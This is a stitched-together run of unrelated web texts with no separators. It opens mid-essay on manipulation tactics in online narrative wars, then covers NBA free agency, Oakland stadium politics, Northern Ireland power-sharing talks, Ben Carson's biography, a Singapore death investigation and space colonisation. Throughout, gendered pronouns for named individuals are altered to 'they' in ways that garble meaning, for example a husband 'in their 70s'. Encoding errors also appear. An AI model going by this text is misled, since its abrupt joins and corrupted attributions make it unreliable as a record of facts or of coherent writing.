If one is fighting for a noble cause or some kind of “cosmic struggle”, all behaviour is justified, however underhanded, abusive or distasteful. This often goes hand in hand with Infallibility, and often excused as “punching up” when the group imagines itself as persecuted. Many times, it is at best punching sideways or in some cases punching down. Orwell wrote in Notes on Nationalism:
“There is no crime, absolutely none, that cannot be condoned when “our” side commits it. Even if one does not deny that the crime has happened, even if one knows that it is exactly the same crime as one has condemned in some other case, even if one admits in an intellectual sense that it is unjustified — still one cannot feel that it is wrong. Loyalty is involved, and so pity ceases to function.”
This should be familiar to anyone who has spent time in the trenches of a Hashtag war and witnessed the despicable behaviour, hypocrisy and double standards on display therein.
Denial
If people exist that do not fit into your narrative, claim they do not exist (sockpuppets, shills), have been brainwashed by the Other (denial of agency) or are deliberate agitators (trolls). This is especially effective when the narrative relies on an imagined dominant group or caste.
Ubiquity
By constant blogging and producing media, the amount of information selling your narrative makes it “true” by sheer ubiquity. This is where access to large media platforms acts as a crucial vector of your version of reality, especially when comments are heavily policed or non existent. Cite each other as supporting evidence to form a web of self-supporting information. (Natural News cites Infowars and vice versa). As the narrative grows, the more ubiquitous the “reality” it describes.
Canonicity
Aim to dominate trusted sources like Wikipedia and cite only sources that promote this narrative (see Ubiquity) ensures that you control the “canonical” version of reality. Those with a passing interest will take this for the “real” version of events. If you cannot dominate such sources, claim they have been infiltrated by the Others of your narrative.
The edit war surrounding the #GameGate controversy was recently subject to a massive arbitration case on Wikipedia in which 27 editors were named, with 11 receiving topic bans and one a site-wide ban. Interestingly, the media coverage of the case led by the Guardian — criticised by Wikipedia as “completely ridden with factual errors” — spread widely online and was duplicated by nine other websites, altering public perception of what had actually occurred and supporting a particular narrative (see Ubiquity).
The Los Angeles Lakers have been extremely quiet this entire offseason, preaching patience as they looked to preserve their salary cap space for 2018. They had been mentioned as possibilities for a number of players, but the most recent, and arguably most intriguing, was Kentavious Caldwell-Pope.
Once the Detroit Pistons renounced their rights making them an unrestricted free agent, the Lakers immediately became interested. As with all other players they were looking at, Caldwell-Pope would have to be willing to take a one-year contract.
They did exactly that as Brian Windhorst of ESPN reports that the Lakers and Caldwell-Pope have agreed to a one-year, $18 million deal:
Kentavious Caldwell-Pope has agreed to a one-year, $18 million deal with the Lakers, sources tell ESPN. — Brian Windhorst (@WindhorstESPN) July 12, 2017
This is a huge signing for the Lakers as Caldwell-Pope fills a major hole at the shooting guard position and brings the two things the Lakers have said they are looking for in shooting and defense. Caldwell-Pope can be a spot-up shooter, attacks well off the dribble, and is capable of guarding the other team's best guard.
Caldwell-Pope is also only 24 years old so they fit in with the youth of the Lakers and has plenty of room for growth, much like the Lakers other top players such as Brandon Ingram and Lonzo Ball.
Though it is only a one-year deal, the Lakers could decide to keep Caldwell-Pope around long term next summer. The team will have a lot of salary cap room and will be much more willing to offer long-term deals.
For now, the Lakers have finally made their first move of free agency and now fans will wait to see if another one is on the way. In addition to meeting with Caldwell-Pope, the Lakers also met with Rajon Rondo who has long been a rumored possibility and may also be on their way to Los Angeles.
Last fall-winter, I organized a Fire Emblem Awakening artbook. I made a journal about it when preorders were going. I'm happy to say that the artbook has been a huge success 8) Thank you everyone who purchased a copy! It was really a great project to work on and i was so happy it got very positive feedback.This art was used for the cover! The cover itself was a little wonky and not as how i completely imagined it but the spread itself I'm rather happy with hehe even though now i just see GLARING MISTAKES IN SOME AREAS.... Just a little announcement! I'm gonna be atthis weekend in San Jose! My table number is. I'll be selling extra copies of the Fire Emblem artbook so if you missed preorder period I'll be selling them there. A few more things will be announced but I'll wait until fanime is over. *-*
Story highlights Errol Louis: James Comey's prepared statement to Congress makes clear that President Trump is their own worst enemy
If he's wise, Trump will simply hunker down and try to stoically endure the storm of bad news coming their way, Louis writes
Errol Louis is the host of "Inside City Hall," a nightly political show on NY1, a New York all-news channel. The opinions expressed in this commentary are their own.
(CNN) Be careful what you wish for.
Former FBI Director James Comey's prepared statement to Congress makes clear that when it comes to the ever-expanding investigation of alleged Russian involvement in the 2016 election, President Trump is their own worst enemy. Against the advice of allies and adversaries alike, Trump has repeatedly, almost obsessively, attempted to shut down Russia-related inquiries.
Errol Louis
The effort, predictably, has backfired.
Instead of tamping down the issue, Trump has revved up public interest. Instead of asserting control of the FBI and other intelligence agencies, they now face a probe led by a formidable independent counsel, Robert Mueller, the second-longest serving director in FBI history.
And instead of Comey's statement clearing President Trump in the eyes of the public, they now look like a man with something to hide.
OAKLAND — Ignacio De La Fuente, the gruff, straight-talking, influential former Oakland councilman, is returning to the limelight, this time as a member of the Coliseum authority board at what is perhaps its most critical time in two decades.
Their return comes as the Raiders are packing for Las Vegas and the Warriors are headed across the bay to San Francisco. It's also an opportunity for redemption for the man who helped orchestrate the Raiders' return to Oakland in 1995, a deal that brought the NFL franchise back but saddled the city and county with millions in debt.
They will be part of the team that signs off on negotiated contracts for the arena and the football/baseball stadium, along with the Oakland City Council and the Alameda County Board of Supervisors.
This month, the county supervisors approved Supervisor Scott Haggerty's appointment of De La Fuente to the Oakland Alameda County Coliseum Authority to replace Mary Warren. Warren died at age 94 in August.
“Right now we have the possibility of losing two teams,” De La Fuente said this week. “I live in Oakland; I love the city; I'll definitely do whatever I can.”
De La Fuente represented the Fruitvale district from 1992 to 2013 and was one of the council's most powerful members. They served as council president for nearly a decade, assembling votes to usher in economic development proposed by then-Mayor Jerry Brown. A walkway at the Fruitvale Transit Village in their district bears their name.
De La Fuente ran for mayor twice, losing to Brown in 1998 and Ronald Dellums in 2006.
“Ignacio just ran into some bad luck there,” said county Supervisor Nate Miley, a former Oakland councilman and current authority board member. “He would have won if they weren't facing two giants.”
Part of De La Fuente's legacy stems from the central role they played in helping lure the Raiders back from Los Angeles in 1995 when Al Davis owned the team. As part of the deal, $197 million in bonds paid for Coliseum renovations, including building a tall section of seats derisively dubbed “Mount Davis” and adding luxury boxes. The money was supposed to be paid off by selling “personal seat licenses” to season ticket holders, but not enough fans paid upward of $4,000 to be able to purchase season tickets long term.
That left taxpayers on the hook: $95 million in debt remains for the Coliseum renovations, with another $68 million in debt for renovations made at Oracle Arena, where the Golden State Warriors play, according to Scott McKibben, executive director of the Coliseum authority. De La Fuente also served on the Coliseum authority in the 1990s.
“The biggest problem about ‘95 was the city and county hung themselves out” by relying on using the seat licenses to pay it off, said Ralph Kanz, a former Oakland public ethics commissioner. “Outside of that, it didn't look that bad, but it was a big assumption that that many people would be willing to pay that much money for the right to buy a ticket.”
Looking back, De La Fuente acknowledges mistakes were made, but said that isn't going to stop them and local leaders from working to keep the sports franchises in Oakland.
“You can call it a bad deal, you can call it whatever you like, but we spent $200 million back in the day, remodeled the Coliseum, Oracle and retained three teams,” they said. “The way I see it, I don't think it was a terrible deal. Could we do better? Absolutely, but talk is cheap and we just got to get it done.”
Haggerty, who appointed De La Fuente, said the authority needs their institutional knowledge as it negotiates a new lease with the Warriors for their remaining seasons in Oakland, and tries to stop the Raiders from leaving to Las Vegas.
“I wanted to pick somebody who can hit the ground running,” Haggerty said.
The Warriors' current five-year lease expires June 30. The team has paid $1.5 million a year in rent at Oracle. On Friday, the authority hired a law firm to advise them on their talks with the NBA team, which in addition to the lease includes negotiations on the remaining debt.
Local officials have an uphill climb to try to keep the Raiders in Oakland. Owner Mark Davis has filed for relocation to Las Vegas, where they have $750 million in public money and another $650 million from casino mogul Sheldon Adelson to build a $1.9 billion stadium. NFL owners, who need to approve the move, could vote in March.
A group led by NFL Hall of Famer Ronnie Lott is working with Oakland officials to build a stadium, hotels, restaurants and offices at the current Coliseum site. They are expected to present their plan for the $1.3 billion development to an NFL committee in the coming months.
Reebok Alien Stompers, the shoes worn by Sigourney Weaver in the 1980s classic Aliens is making a comeback, reports THR.
Fox studios will be unveiling a new line of Alien related merchandise to be released on April 26 which is being promoted as Alien Day akin to Star Wars Day (May 4) (or May 25) and Back to the Future Day (October 21). (The date is connected to the planet known as LV-426, the planet which is key to Alien lore.)
UPDATE: Click here for more new info and photos.
More details are as follows:
Reebok is releasing an exact replica of the Alien high-top Stompers worn by Weaver as Ellen Ripley. Also being released is the mid-top version worn by Lance Henriksen as the android Bishop. The movie sneakers will be available beginning April 26 at Reebok.com and select Reebok stores worldwide. The Stompers hold a unique place in the movies. The shoes were made by the company specifically for the James Cameron film and became, along with Back to the Future's Nike Air Mag, one of cinema's famous footwear. Reebok released the version of the shoe a year after the movie opened, but only for a limited time. The shoes have enjoyed a revival in recent years, with cosplayers making their own versions and while certain shops made their own custom versions. Most iterations of the shoes were not the high-top model but the mid-top, making the new shoes faithful to what was seen on screen.
Here are the shoes worn by Bishop. (Source: Asphalt Gold)
After months of speculation, Google confirmed Tuesday that its ultra-fast Internet service will soon be coming to four more cities — Atlanta, Charlotte, Nashville and Raleigh-Durham, N.C. Those regions, along with more than a dozen cities in their immediate vicinity, will be the latest to benefit from high-speed Internet provided by the search giant.
Google Fiber already sells Internet service with download speeds of up to 1 gigabit per second — roughly 100 times faster than the national average — for $70 a month in other cities, such as Provo, Utah.
Google had been considering expanding to as many as nine metropolitan areas. In a blog post Tuesday, Google said it was still in talks with five of those cities — Phoenix, Salt Lake City, San Antonio, San Jose and Portland, Ore. — and would decide whether to expand into those regions later this year.
Construction in Atlanta and the three other cities named Tuesday will begin in a few months, according to Google.
The announcement marks the latest salvo in a growing battle between Google and more traditional Internet providers for the next generation of Web users. It also comes on the heels of President Obama's call to promote broadband in cities that are unserved or underserved by large commercial providers.
Google Fiber has already deployed in places such as Kansas City, and it is now taking sign-ups in Austin, where the arrival of Google's Internet service has sparked an arms race among providers of high-speed connectivity. That includes companies such as AT&T, which has said it's considering as many as 100 cities for an expansion of its own gigabit fiber service.
(RELATED: Google: Strong net neutrality rules won't hurt the future rollout of Google Fiber)
Image caption The BBC understands the talks ended at about 19:30 BST on Friday, breaking up fairly abruptly
The absence of devolved government in Northern Ireland "cannot continue for much longer", Secretary of State James Brokenshire has said.
They spoke after another day of talks between the Democratic Unionist Party (DUP) and Sinn Féin ended with no deal.
Theresa May phoned DUP leader Arlene Foster and Sinn Féin's northern leader, Michelle O'Neill on Friday evening.
The PM told them their government was committed to doing all it could to help parties reach a successful conclusion.
'Running the show'
A No 10 spokesperson said Mrs Foster and Mrs O'Neill "both agreed on the need for the executive to be restored for the benefit of everyone in Northern Ireland".
"The prime minister recognised that constructive discussions had taken place between the parties and urged them both to come together reach a collective agreement so that devolved government could be restored in Northern Ireland."
The BBC understands the latest round of Stormont talks ended at about 19:30 BST on Friday, breaking up fairly abruptly and not in a positive mood.
Sinn Féin said no progress was made but added talks will resume on Saturday.
Speaking on the BBC's Any Questions programme, Mr Brokenshire said: "We've obviously had an extended period where Northern Ireland has not had politicians making decisions.
"The Northern Ireland Civil Service has effectively been running the show here. That cannot continue for an extended period, for much longer.
"I've already had to make certain statements over the budget to ensure that civil servants are able to do their job, so yes, it is about that focus on what now needs to happen."
Image caption Mr Brokenshire (right) took part in a recording of the BBC's Any Questions programme in Ballymena
When the parties missed a government deadline on Thursday, the secretary of state extended the talks over the weekend, in the hope that a deal will be struck by Monday, when they are due to make a statement on Stormont's future.
Earlier, Sinn Féin called for the British and Irish prime ministers to become directly involved in the talks process.
The party said the DUP had not moved on a number of issues, including an Irish language act, same-sex marriage, a Bill of Rights and measures to deal with the legacy of the Troubles.
Sinn Féin's Conor Murphy said it was a "source of frustration" there had been no closing of the gap between the parties throughout the day.
They claimed that the DUP "haven't yet accepted what brought down the institutions in the first place".
But the DUP's Christopher Stalford said Sinn Féin had presented a "shopping list" of demands and was refusing to go back into government until they had received every item on their list.
'5% budget cut'
Their party colleague, Edwin Poots, rejected a call for the prime ministers to get involved and said Sinn Féin knows what is required and "don't need anyone to hold their hands".
Mr Poots said Thursday's missed deadline meant Stormont was now "operating on a 95% budget, which is essentially a 5% cut across all of the departments".
The DUP MLA described this as "far greater austerity than any Conservative ever imposed upon the Northern Ireland public".
Image caption Edwin Poots of the DUP said Sinn Féin "don't need anyone to hold their hands"
"Whilst we understand that Irish language is hugely important to Sinn Féin - health, education, jobs, the economy, infrastructure, environment, agriculture - all of these issues are hugely important to us, hugely important to the public," Mr Poots said.
Responding to their remarks, Mr Murphy said: "The DUP are in absolutely no position to lecture anyone in relation to the provision of public services."
The Sinn Féin MLA accused DUP MPs of voting for a measure in the Queen's Speech "which will effectively remove and reduce public sector wages".
Earlier, their Sinn Féin colleague John O'Dowd said there must be a "step change" for talks to succeed.
Media playback is unsupported on your device Media caption Sinn Féin's John O'Dowd calls on PMs to join Stormont talks
"As co-guarantor of the agreements, it is time for the British Prime Minister Theresa May and the Taoiseach (Irish Prime Minister) Leo Varadkar to take direct responsibility."
Mr O'Dowd also said the DUP's "confidence and supply" deal with the Conservatives had "emboldened and entrenched" their views, making the prospect of a deal less likely.
A Downing Street spokesperson said that the secretary of state was on the ground in Belfast and would continue to engage intensively with the parties on Friday and over the weekend.
"The prime minister has met with all five parties and will continue to have close engagement with the Northern Ireland secretary and the taoiseach, who they spoke with earlier this weekend," they added.
'Crisis to crisis'
The secretary of state has the option of giving the parties more time to negotiate, calling another assembly election or reintroducing direct rule from Westminster.
The independent chair of the talks process, Sir Malcolm McKibbin, formally retired on Friday as head of the Northern Ireland Civil Service.
However, parties asked them to stay on as chair to steer the negotiations.
Analysis: Mark Devenport, BBC News NI political editor
While we've bust through another deadline, it's a deadline that theoretically still exists.
So, Secretary of State James Brokenshire is under responsibility to set a date for a fresh assembly election.
However, everybody is expecting they will consider their options and come through with an emergency law to either allow for yet another deadline or move towards to some form of direct rule.
The mood music around Stormont hasn't been particularly favourable.
I don't get any kind of immediate sense that the parties are going to come up with an ingenious compromise.
Under the deal signed in Downing Street on Monday, the minority Conservative government can rely on the support of the DUP's 10 MPs to get legislation through the House of Commons.
Critics of the deal have questioned whether the Westminster government can act with impartiality between unionists and Irish nationalists when it is dependent on the support of the DUP.
Conservative MP Laurence Robertson told the BBC's The View programme that Mr Brokenshire would "weigh it up over the weekend" but added they did not believe there was any appetite for another snap assembly election.
Mr Robertson chaired Westminster's Northern Ireland Affairs Committee for two terms from 2010 until the Dissolution of Parliament in May this year.
Image caption Conservative MP Laurence Robertson blamed Sinn Féin for the Stormont standoff
They told the programme that Stormont could not "keep stumbling from crisis to crisis" but added they hoped Northern Ireland was not heading for a prolonged period of direct rule.
"I sincerely hope not, I was a shadow minister when we had the last period of direct rule and very important issues are decided upstairs in the House of Commons, in a committee of 20 MPs.
"That's no way to run Northern Ireland so I sincerely hope not.
"But, somebody has to run the province, so if that's what Sinn Féin are forcing, well, that might be the only option."
'Dangerous game'
However, Mr Robertson said they did not think their party's agreement with the DUP was causing the problem, because Stormont's latest crisis had happened "long before" the deal.
"I think it's a problem within Sinn Féin," the Tory MP said.
"I don't know what game they are playing, but I do know it's a dangerous one."
Northern Ireland has effectively been without a devolved government for almost six months.
Its institutions collapsed amid a bitter row between the DUP and Sinn Féin about a botched green energy scheme.
The late deputy first minister, Martin McGuinness, stood down in protest over the DUP's handling of an investigation into the scandal, in a move that triggered a snap election in March.
Folks with a synth “problem,”
To celebrate the upcoming Brooklyn Synth Expo 2017 at Main Drag Music we are giving away a Roland Boutique SE 02 Analong Synth complete with a DK-01 dock!
A collaborative effort from Roland and Studio Electronics, the SE-02 is the debut product of the new Roland Boutique Designer Series. The SE-02 uses authentic discrete analog circuitry to create a synthesizer with a distinctly vintage sound and vast programming options. With an array of high-quality knobs and switches and a uniquely creative onboard sequencer, the SE-02 delivers massive tone and texture with expressive hands-on control.
All you need to do to win it is sign up below by October 24th – and hope!
P.S. There's another giveaway linked to the BK Synth Expo here!
By clicking the “Submit” button, I agree to the Official Rules & Regulations.
While Splatoon certainly has a great multiplayer component, one area that doesn't seem to be discussed much is the single player campaign. Splatoon's campaign serves partly as a way for players to get used to the game's mechanics before heading into the online battleground. A lot of people seemed to enjoy this mode and even suggested making a single player spin-off Splatoon title. As fun as that may be, such a game is not in the works. In a recent interview with Game Informer, Splatoon co-director Yusuke Amano and producer Hisashi Nogami stated that there are no plans for a single player spin-off, though a campaign update is possible.
When asked about the possibility of a single-player Splatoon title, Amano and Yogami discussed the connection between single player and multiplayer modes and how that dynamic affects the idea of a single player title:
Amano: When we envisioned the single player mode, we saw it as a way of teaching those game mechanics I mentioned earlier to players and as something they would be able to take with them into multiplayer mode in the game. One thing with the single-player mode is that it was sort of a way to expand the world view of Splatoon – the sort of story, if you will – that we weren't able to do in the multiplayer mode. Regarding any kind of spin-off or expansion, rather than just releasing additional stages for the single player mode, if we wanted to do something like that, I would want to make it a larger scale update. There were elements of the single-player mode that I wasn't completely satisfied with myself. Nogami: I really think that there's a strong connection between the two modes in the game. So we don't actually have any plans to just release a single player spin-off of the game itself due to the strength of that connection.
Personally, I like the idea of a single player Splatoon entry, though I wouldn't mind a campaign update either. There certainly is a strong connection between the two modes, though I don't believe it's strong enough to prevent a single player title from being created. What do you think? Should there be a single player Splatoon spin-off?
Source: Game Informer
After what's being seen as an “oversightâ€ by the state of Mississippi, the Southern territory has become the last state to consent to the 13th Amendment–officially abolishing slavery.
It's been 150 years since Abraham Lincoln signed the Emancipation Proclamation–abolishing slavery in the United States–and 148 years since the 13th Amendment was passed, but somehow, the state of Mississippi failed to ratify the law, which states, “Section 1. Neither slavery nor involuntary servitude, except as a punishment for crime whereof the party shall have been duly convicted, shall exist within the United States, or any place subject to their jurisdiction. Section 2. Congress shall have power to enforce this article by appropriate legislation.â€
According to the New York Post, Mississippi resident and professor at the University of Mississippi Medical Center, Dr. Ranjan Batra, watched DreamWorks SKG's film, Lincoln, and got to thinking.
“Batra returned home and started researching when each individual state ratified the 13th Amendment and was shocked to learn that Mississippi was the only state that had failed to do so,â€ reports the Post. “Apparently, state Senator Hillman Frazier introduced a resolution to ratify the amendment in 1995, which unanimously passed both the Mississippi Senate and House, only for the resolution to never become official because then-Secretary of State Dick Molpus never sent a copy of the resolution to the Office of the Federal Register.â€
In light of the former Secretary of State's unintentional actions, the proper paperwork was finally submitted to the Office of the Federal Registrar on January 30. One week later, on February 7, the director of the Federal Register, Charles A. Barth, replied to the Southern state saying, “With this action, the State of Mississippi has ratified the 13th Amendment to the Constitution of the United States.â€
In preparation for an interview with Ben Carson on "New Day" Friday, CNN investigated claims the retired neurosurgeon made about their upbringing in their 1990 autobiography "Gifted Hands: The Ben Carson Story," but was unable to find corroboration for the incidents of violence that are at the core of their story of transformation from an angry young man into the calm, collected GOP hopeful they are today.
Carson claims to have punched a seventh-grade classmate in the head while holding a lock, and attempted to stab a classmate named "Bob" in ninth grade, but CNN spoke to nine people who knew them at the time -- two of whom lived next door to the Carsons and knew young Ben well -- and not a single one of them could corroborate their stories.
Advertisement:
Carson has said that this is because they were ashamed of their temper and hid it from the world, but the incident in seventh grade allegedly happened at school, where one classmate, Gerald Ware, said that if it had happened, "it would have been all over the school."
Carson wrote in "Gifted Hands" that people who didn't know them as a youth would "think I'm exaggerating when I say I had a bad temper," but even the people who did know them believe he's exaggerating.
"He got through their day trying not to be noticed," Robert Collier told CNN. "I remember them having a pocket saver. They had thick glasses. They were skinny and unremarkable."
Dorian Reeves, who attended elementary, middle and high school with Carson, said "I personally do not have knowledge of those incidents." Upon learning of them in Carson's book, they said, "I wondered, 'When did that happen?'"
Kevin Fobbs was in the same ROTC unit as Carson, and said that when racial tensions at the school ran high, the GOP hopeful was a voice of reason. "'Forget that, leave that at the door,'" they recounted Carson saying. "'Inside here, this is a safe haven.'"
Fobbs added that although there were "a couple thousand kids" at the school, "we were a very small unit, so you would have heard about [incidents like those Carson described] within like half a day."
Advertisement:
Carson is a self-confessed plagiarist, so it's possible that these incidents happened to someone else and they merely appropriated them in order to embellish just how soiled the rags from which they emerged into riches actually were -- but if that's the case, he's not talking.
When CNN contacted Carson's campaign, their adviser Armstrong Williams replied via email, writing "Why would anyone cooperate with your obvious witch hunt? No comment and moving on...... Happy Halloween!!!!!"
Watch our video summary below:
[jwplayer file="http://media.salon.com/2015/11/CarsonChildhoodFinal_Asha_11.5.2015.mp4" image="http://media.salon.com/2015/11/Screen-Shot-2015-11-05-at-12.23.53-PM.png"][/jwplayer]
SINGAPORE - A 77-year-old woman was found dead in the living room of a fifth floor flat in Tampines on Monday (Feb 13).
Police are investigating the case as an unnatural death.
A Police spokesperson said that a call for assistance was received at about 2.10pm at Block 276, Tampines Street 22. It is understood that a neighbour made the call.
The woman, believed to be Madam Tay Quee Lang, was found with a knife lodged in their throat.
A female family member, who came to the door of the unit later in the evening, would only say that the family is “hurting inside”.
Neighbours told ST that Madam Tay lived in the four-room flat with their husband, who is in their 70s, and an Indonesian maid, who started working for the family only about a month ago.
Engineer Ashaari Hasan Basri, 28, who lives on the same floor, had called the police after hearing the maid's cries for help.
“She was crying and shouting ‘ah ma' (hokkien for grandmother) from inside the unit so I rushed over. They looked at a lost and only told me that ‘ah ma' had slashed themselves with a knife,” they said.
Looking through the window into the unit, they noticed the woman slumped on a wheelchair facing them with a bloodied knife, measuring about 20cms long, lodged in their throat.
“There was also blood on the floor and on their clothes,” they said.
They added that the couple, whom they described as kind-hearted, loving and friendly, had lived in the flat for more than 30 years.
They also enjoyed going out together, they said.
However, Madam Tay suffered a stroke about three years ago and could no longer move about without their husband's assistance, said Mr Ashaari's 56-year-old mother, Madam Ainon Ali.
Madam Ainon said that Madam Tay fell down at home around the end of last year and had to be in a wheelchair since then. They also stopped going down to do exercises.
Madam Tay's husband, Mr Tan Hee Seng, would visit the nearby market to buy groceries to cook lunch for their wife almost every day.
They had been out for a check-up at the hospital when the incident happened. They returned only after police had arrived on scene.
At about 5.30pm, about 10 people - believed to be family members - had gathered along the corridor of the unit. They declined to speak to reporters.
The Indonesian maid, who was home at the time, was taken away by police officers to assist in investigations at about 6pm. No arrests have been made so far.
The body was taken away at about 7pm.
Science fiction has delivered on many of its promises. Star Trek videophones have become Skype, the Jetsons' food-on-demand is materialising through 3-D printing, and we have done Jules Verne one better and explored mid-ocean trenches at crushing depths. But the central promise of golden age sci-fi has not yet been kept. Humans have not colonised space.
For a brief moment in the 1970s, the grandeur of the night sky felt interactive. It seemed only decades away that more humans would live off the Earth than on it; in fact, the Space Shuttle was so named because it was intended to make 50 round trips per year. There were active plans for expanding civilisation into space, and any number of serious designs for building entire cities on the moon, Mars and beyond.
The space age proved to be a false dawn, of course. After a sobering interlude, children who had sat rapt at the sight of the moon landings grew up, and accepted that terraforming space – once briefly assumed to be easy – was actually really, really hard. Intense cold war motivation flagged, and the Challenger and Columbia disasters taught us humility. Nasa budgets sagged from 5% of the US federal budget to less than 0.5%. People even began to doubt that we'd ever set foot on the moon: in a 2006 poll, more than one in four Americans between 18 and 25 said they suspected the moon landing was a hoax.
But now a countercurrent has surfaced. The children of Apollo, educated and entrepreneurial, are making real headway on some of the biggest difficulties. Large-scale settlement, as opposed to drab old scientific exploration, is back on the menu.
Space cities come in three basic models. The classic one is to terraform a nearby Earth-like object, by using massive geo-engineering projects or bio-domes to create a lunar or Martian metropolis. The second is the low-Earth orbit model: this expands upon the currently inhabited region of space. Think of the International Space Station as a government fort, around which commercial trading posts, homesteads and finally urban areas develop. Then there is the free space model, basically floating cylinders with artificial gravity, surviving by digesting the natural resources of outer space. As the saying goes in the space community: once you're out of Earth's gravity well, you're halfway to anywhere.
In the 1970s, Princeton physicist Gerald K O'Neill envisioned 100,000-person colonies, stationed at what is known as the fifth Lagrangian libration point (L5) in the moon's orbit – like a gravitational eddy where things stay put by themselves. Encouraged by fellow physicists Freeman Dyson and Richard Feynman, they posited a "planar cluster" housing four billion people across 30,000km of space. “It is orthodox to believe that Earth is the only practical habitat for Man,” they wrote in Physics Today in 1974, but we can “build new habitats far more comfortable, productive and attractive than is most of Earth.” O'Neill called the classic model of colonising planets proper a “mental hang-up”, and suggested it lacked imagination for the possibilities of open space.
SpaceX employees watch the launch of its Falcon rocket and Dragon module
In O'Neill's vision, cable cars would connect communities spaced at 200km intervals. Single-family spacecraft – the minivans of the sky – would act as recreational vehicles. On the inner surface of what would be rotating habitats, strips of land would alternate with windows to let in sunlight. That same sun would provide all of our energy needs (a much bolder statement in the 70s than it is now), while the moon would be mined for aluminum and titanium to use in habitat construction. Asteroids, containing water and other material, could be towed along behind the city in the vacuum. Their idea to build such cities in the moon's L5 orbital point inspired the influential L5 Society, which aimed to realise their vision by 1995. Their motto: L5 in '95!
O'Neill's dream did not come to pass – not because it was inherently flawed, but because it was an idea before its time. Spaceflight infrastructure was in its infancy, and costs were prohibitive. We simply didn't know enough of the basics to jump straight into urban design.
The central challenge to building a city in space is to create a closed system that can sustain itself for the long haul. Urban areas on Earth survive only by relying on a much larger footprint than their metropolitan boundaries. The more isolated a space city is – the farther from external resupply resources – the more closed its oxygen, food and water loops must be. The ISS, for example, has about 40% efficiency in its oxygen recycling, and even so its ambient CO2 levels are perpetually high. (Nasa is working on how to convert that CO2 directly into oxygen.) As for food, any space-based urban plan would require rolling out high-yield agriculture on an unprecedented scale – though 3D printers could, given some fresh ingredients, print a pizza.
The other big problem for a space city is how humans would function physiologically. The neighborhood gym would be a popular destination: though the human species is ill-suited for some aspects of deep space, 14 years of continuous presence on the ISS have advanced our understanding of how to adapt physically for a lifetime among the stars. Early astronauts paid for this knowledge the hard way, as it were, with their bone density. Today's ISS crew train for 2.5 hours a day on a jury-rigged zero-gravity exercise contraption in order to keep their bone density at normal levels. Still, with longer stays in zero gravity, new problems seem to crop up. For example, your cerebrospinal fluid – the clear liquid found in the brain and spine – drifts upward, where it engorges your retina and flattens your eyeball. “I lost two diopters in my eyes,” recalls former astronaut Michael López-Alegría, who spent 215 consecutive days on the ISS. “It's also pretty easy to get something in your eye up there. You just walk into something.”
City walls would be required to shield space citizens from the brutal radiation bombardment of deep space. “Aluminum shielding can actually be part of the problem,” says Vince Michaud, Nasa's deputy chief health and medical officer. “Radiation that makes it through takes some of the aluminum with it.” Nasa spends $28m every year in radiation research alone, including pharmaceutical and nutriceutical countermeasures and magnetic shielding. Bill Paloski, director of Nasa's Space Life and Physical Sciences division, believes that by 2024 their team will be able to mitigate the health risks of space.
As for actually getting people to the space cities in the first place, it won't be using rockets – basic physics doesn't cooperate. Rather, space elevators, or “beanstalks”, promise to close that gap. Vehicles would climb out of the gravity well along a cable anchored to the equator and held under tension by centrifugal force on a counterweight ten of thousands of kilometers high. Until now, materials science hadn't produced the kind of tensile strength required for a space elevator cable – even carbon nanotubes are too weak by themselves – but in 2010 the Nobel prize in physics was awarded for experiments on graphene. A one-atom sheet of pure carbon that is 100 times stronger than steel, graphene is a promising candidate for space elevator cable material.
Facebook Twitter Pinterest Video: the Orphans of Apollo trailer
“We can colonise the moon, Mars … wherever people want, really,” SpaceX chief executive Elon Musk (of Tesla Motors fame) told documentary-makers on the film Orphans of Apollo. “I think Mars is the logical place to go.” Musk's company, specialists in space transport, are one of the most serious around; none of this conversation would be happening without SpaceX, and Musk is not alone in thinking of colonising Mars first. But though it may be easier to generate excitement around the Red Planet, insofar as the moon feels like an achievement already under our belts, several characteristics make Mars harder to colonise.
Martian gravity is three-eighths that of Earth, making landings more hazardous than in the moon's one-sixth gravity. On the Apollo missions, lunar dust got everywhere – the crews inhaled it and got it in their eyes, and it wreaked mechanical havoc – and on Mars the dust is even more problematic, because it is highly oxidised, chemically reactive, electrically charged and windblown. Mars's chlorinated soils would be toxic, for example, to the human thyroid gland.
There was some early speculation that a space city could be buried under the Martian surface to protect its inhabitants from radiation. Pamela Conrad, an astrobiologist with Mars Science Laboratory, contends that we would be digging from a rock into a hard place. “Trying to drill down to shield from ionising radiation might be okay for bacteria, but materials in the core are radiating, too,” they warn.
A lunar city, on the other hand, has the advantage of being up to a thousand times closer – practically next door – and as such could participate in Earth's economy to some extent. Possible anchor industries could include space tourism and titanium mining, as well as pharmaceutical factories that require microgravity. The moon is also rich in helium 3, which is rare on Earth and thought to be a potential fuel source for future fusion reactors.
And industry is very much at the top of the agenda. Today the biggest space operation in the world is neither Nasa's nor that of the US defense department, but DirecTV, valued at more than $48bn. Low-Earth orbit is quickly becoming the realm of the private sector – including the loose agglomeration of companies known collectively as NewSpace, which have shaken human spaceflight progress out of a sluggish period. Using the window created by the withdrawal of public funds from space programmes, NewSpace has fostered trust with government and increasingly enjoys the blessing of the US State Department, which controls export permits for objects being launched into orbit. Public sector clients like Nasa and the Air Force Space Command purchase equipment and supplies, and depend on the ingenuity and dexterity of the market. Indeed, Nasa has an $800m program to develop the commercial space market. Costs have come down dramatically as a result.
One figure in NewSpace taking advantage of this new flexibility is hotel tycoon Robert Bigelow. In 2015, the owner of Budget Suites of America will use a SpaceX rocket to send one of their inflatable space habitat modules up for testing at the ISS. These ingenious blow-up houses are capable of operating independently as space stations, and Bigelow wants to lease them as hotel suites (no surprise there), laboratories or for whatever else you might want. Nasa, having no current plans of their own for a moon mission, have given their blessing to Bigelow to use similar inflatable modules to build a lunar base.
Facebook Twitter Pinterest Inflatable space habitats made by Bigelow Aerospace, whose founder owns the Budget Suites of America hotel chain. Photograph: Nasa/Bill Ingalls/Getty
If they don't get there soon, the Chinese may beat them to it. Whereas Russia has been integrated into the global space community fairly effectively since the end of the cold war, China does not partner with the other big players. Instead, it plays its own game: in December of last year, as part of the country's 12th Five-Year Plan, China's lunar rover Chang'e 3 made the first soft landing the moon has seen since 1976. China is somewhat secretive about its space progress, but among its stated goals is to establish a crewed lunar base.
